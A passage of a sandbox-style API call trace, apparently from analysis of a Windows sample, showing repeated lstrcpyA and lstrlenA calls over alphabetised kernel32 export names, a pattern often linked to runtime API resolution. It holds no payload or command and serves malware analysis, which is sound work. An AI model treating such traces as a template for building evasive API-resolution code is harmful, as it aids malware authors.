lpString1=0x3f2d6e4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0071.644] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0071.644] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0071.644] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0071.644] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0071.644] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0071.644] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0071.644] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0071.644] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0071.644] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0071.645] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0071.645] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0071.645] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0071.645] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0071.645] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0071.645] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0071.645] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0071.645] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0071.645] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0071.645] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0071.645] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0071.645] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0071.645] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0071.645] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0071.645] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0071.645] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0071.645] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0071.645] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0071.645] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0071.645] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0071.645] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0071.645] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0071.645] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0071.645] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0071.645] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0071.645] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0071.645] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0071.645] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0071.645] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0071.645] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0071.645] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0071.645] lstrlenA (lpString="COPYCONTEXT") returned 11 [0071.645] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0071.645] lstrlenA (lpString="COPYFILEA") returned 9 [0071.645] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0071.645] lstrlenA (lpString="COPYFILEEXA") returned 11 [0071.645] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0071.646] lstrlenA (lpString="COPYFILEEXW") returned 11 [0071.646] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0071.646] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0071.646] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0071.646] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0071.646] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0071.646] lstrlenA (lpString="COPYFILEW") returned 9 [0071.646] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0071.646] lstrlenA (lpString="COPYLZFILE") returned 10 [0071.646] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0071.646] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0071.646] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0071.646] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0071.646] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0071.646] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0071.646] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0071.646] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0071.646] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0071.646] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0071.646] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0071.646] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0071.646] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0071.646] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0071.646] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0071.646] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0071.646] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0071.646] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0071.646] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0071.646] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0071.646] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0071.646] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0071.646] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0071.646] lstrlenA (lpString="CREATEEVENTA") returned 12 [0071.646] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0071.646] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0071.646] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0071.646] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0071.646] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0071.647] lstrlenA (lpString="CREATEEVENTW") returned 12 [0071.647] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0071.647] lstrlenA (lpString="CREATEFIBER") returned 11 [0071.647] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0071.647] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0071.647] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0071.647] lstrlenA (lpString="CREATEFILEA") returned 11 [0071.647] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0071.647] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0071.647] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0071.647] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0071.647] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0071.647] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0071.647] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0071.647] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0071.647] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0071.647] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0071.647] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0071.647] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0071.647] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0071.647] lstrlenA (lpString="CREATEFILEW") returned 11 [0071.647] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0071.647] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0071.647] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0071.647] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0071.647] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0071.648] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0071.648] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0071.648] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0071.648] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0071.648] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0071.648] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0071.648] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0071.648] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0071.648] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0071.648] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0071.648] lstrlenA (lpString="CREATEJOBSET") returned 12 [0071.648] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0071.648] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0071.648] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0071.648] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0071.648] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0071.648] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0071.648] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0071.648] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0071.648] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0071.648] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0071.648] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0071.648] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0071.648] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0071.648] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0071.648] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0071.648] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0071.648] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0071.648] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0071.648] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0071.648] lstrlenA (lpString="CREATEPIPE") returned 10 [0071.648] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0071.648] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0071.648] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0071.648] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0071.648] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0071.649] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0071.649] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0071.649] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0071.649] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0071.649] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0071.649] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0071.649] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0071.649] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0071.649] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0071.649] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0071.649] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0071.649] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0071.649] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0071.649] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0071.649] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0071.649] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0071.649] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0071.649] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0071.649] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0071.649] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0071.649] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0071.649] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0071.649] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0071.649] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0071.649] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0071.649] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0071.649] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0071.649] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0071.649] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0071.649] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0071.649] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0071.649] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0071.649] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0071.649] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0071.649] lstrlenA (lpString="CREATETHREAD") returned 12 [0071.649] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0071.649] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0071.650] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0071.650] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0071.650] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0071.650] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0071.650] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0071.650] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0071.650] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0071.650] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0071.650] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0071.650] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0071.650] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0071.650] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0071.650] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0071.650] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0071.650] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0071.650] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0071.650] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0071.650] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0071.650] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0071.650] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0071.650] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0071.650] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0071.650] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0071.650] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0071.650] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0071.650] lstrlenA (lpString="CTRLROUTINE") returned 11 [0071.650] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0071.650] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0071.650] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0071.650] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0071.650] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0071.650] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0071.650] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0071.650] lstrlenA (lpString="DEBUGBREAK") returned 10 [0071.650] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0071.650] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0071.650] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0071.651] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0071.651] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0071.651] lstrlenA (lpString="DECODEPOINTER") returned 13 [0071.651] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0071.651] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0071.651] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0071.651] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0071.651] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0071.651] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0071.651] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0071.651] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0071.651] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0071.651] lstrlenA (lpString="DELETEATOM") returned 10 [0071.651] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0071.651] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0071.651] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0071.651] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0071.651] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0071.651] lstrlenA (lpString="DELETEFIBER") returned 11 [0071.651] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0071.651] lstrlenA (lpString="DELETEFILEA") returned 11 [0071.651] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0071.651] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0071.651] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0071.651] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0071.651] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0071.651] lstrlenA (lpString="DELETEFILEW") returned 11 [0071.651] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0071.651] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0071.651] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0071.651] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0071.651] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0071.651] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0071.651] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0071.651] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0071.651] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0071.651] 